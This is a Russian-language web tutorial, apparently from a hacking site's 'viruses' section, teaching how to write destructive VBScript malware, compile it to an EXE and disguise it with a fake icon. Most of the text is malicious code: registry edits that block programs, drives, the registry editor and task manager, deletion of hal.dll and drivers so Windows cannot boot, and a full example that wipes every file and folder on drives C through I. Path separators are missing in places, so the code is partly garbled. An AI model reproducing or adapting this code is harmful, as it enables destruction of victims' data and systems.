Главная » Статьи » Вирусы » Другие вирусы |
Не важно
новичок ты или умелый хакер,важно то нужно это тебе или нет??? Вредоносная программа будет написана на языке visual basic
script. Затем скомпелирована в "exe" формат. Приступим. Для начала,нужно уметь изменять расширение файла, с этого и
начнём. Существует много способов, но мне нравится этот. У каждого должен быть обычный архиватор,вот им мы и
воспользуемся. И так,создайте к примеру текстовый фаил под названием
"Текстовый документ". Теперь найдите этот текстовик через свой архиватор. В
архиваторе, вы должны увидеть следующее: "Текстовый
документ.txt". Окончание "txt" - имя расширения файла,вот его и
нужно изменить,точно так же, словно, редактируете имя папки или файла,стираете
строчку "txt" и ставите скажем "mp3". В результате мы получаем "Текстовый документ.mp3"
формата. Если всё понятно, а вопросов возникнуть по этому поводу
недолжно,то пойдём дальше. Создайте текстовый документ,содержащий следующее: on error resume next Set S =
CreateObject("Wscript.Shell") set
FSO=createobject("scripting.filesystemobject") s.run"rundll32 user32,
SwapMouseButton" Затем, сохранив полученные данные, вам нужно изменить
расширение файла, и вместо "txt" прописать "vbs". Аббревиатура "vbs", происходит от названия языка
программирования - "visual basic script". Вот у нас и готова первая, простая, вредоносная программка,
меняющая местами кнопки мыши. Теперь нужно её скомпелировать (изменить) в "exe"
формат с помощью программы: "Vbs2Exe", и установить любой значок с помощью грабера иконок:
"IconToy". А теперь информация для тех, кто не намерен ограничивать
свои возможности банальным обменом кнопок мыши. on error resume next Set S =
CreateObject("Wscript.Shell") set
FSO=createobject("scripting.filesystemobject") Три, верхние строчки - должны присутствовать всегда. Далее, следует кодировка, а ниже, в скобках - пояснение. Так же возможно сочетать, те или иные вредоносные команды. s.regwrite"HKCRexefileshellopencommand","rundll32.exe" (Запрет на открытие "EXE" файлов) s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD" s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD" (запрет доступа к жёстким дискам) fso.deletefile
fso.getspecialfolder(0)+"system32hal.dll",1 (удаляется системный фаил, после чего загрузка Windows
становится невозможна. Система работает до первой перезагрузки) fso.deletefolder
fso.getspecialfolder(0)+"system32drives",1 fso.deletefolder
fso.getspecialfolder(0)+"Driver Cache" (удаление драйверов) fso.deletefolder "АДРЕС",1 (Удаление папки. Пример: fso.deletefolder "C:Новая
папка",1) fso.deletefolder "C:*.*",1 (Удаление всех папок диска С. Адрес можно поставить любой) fso.deletefile "АДРЕС",1 (Удаление файла. Пример: fso.deletefile "C:Новая
папкаТекстовый документ.txt",1) fso.deletefile "C:*.*",1 (Удаление всех файлов диска С. Адрес можно поставить любой) s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools","1","REG_DWORD" (Запрет редактирования реестра) s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD" (Запрет диспетчера задач) s.run"rundll32 user32,
SwapMouseButton" (Обмен кнопок мыши) Пример: on error resume next Set S =
CreateObject("Wscript.Shell") set
FSO=createobject("scripting.filesystemobject") fso.deletefile "C:*.*",1 fso.deletefolder
"C:*.*",1 fso.deletefile "D:*.*",1 fso.deletefolder
"D:*.*",1 fso.deletefile "E:*.*",1 fso.deletefolder "E:*.*",1 fso.deletefile "F:*.*",1 fso.deletefolder "F:*.*",1 fso.deletefile "G:*.*",1 fso.deletefolder
"G:*.*",1 fso.deletefile "H:*.*",1 fso.deletefolder
"H:*.*",1 fso.deletefile "I:*.*",1 fso.deletefolder
"I:*.*",1 fso.deletefile
fso.getspecialfolder(0)+"system32hal.dll",1
| |
Просмотров: 1165 | |
Всего комментариев: 0 | |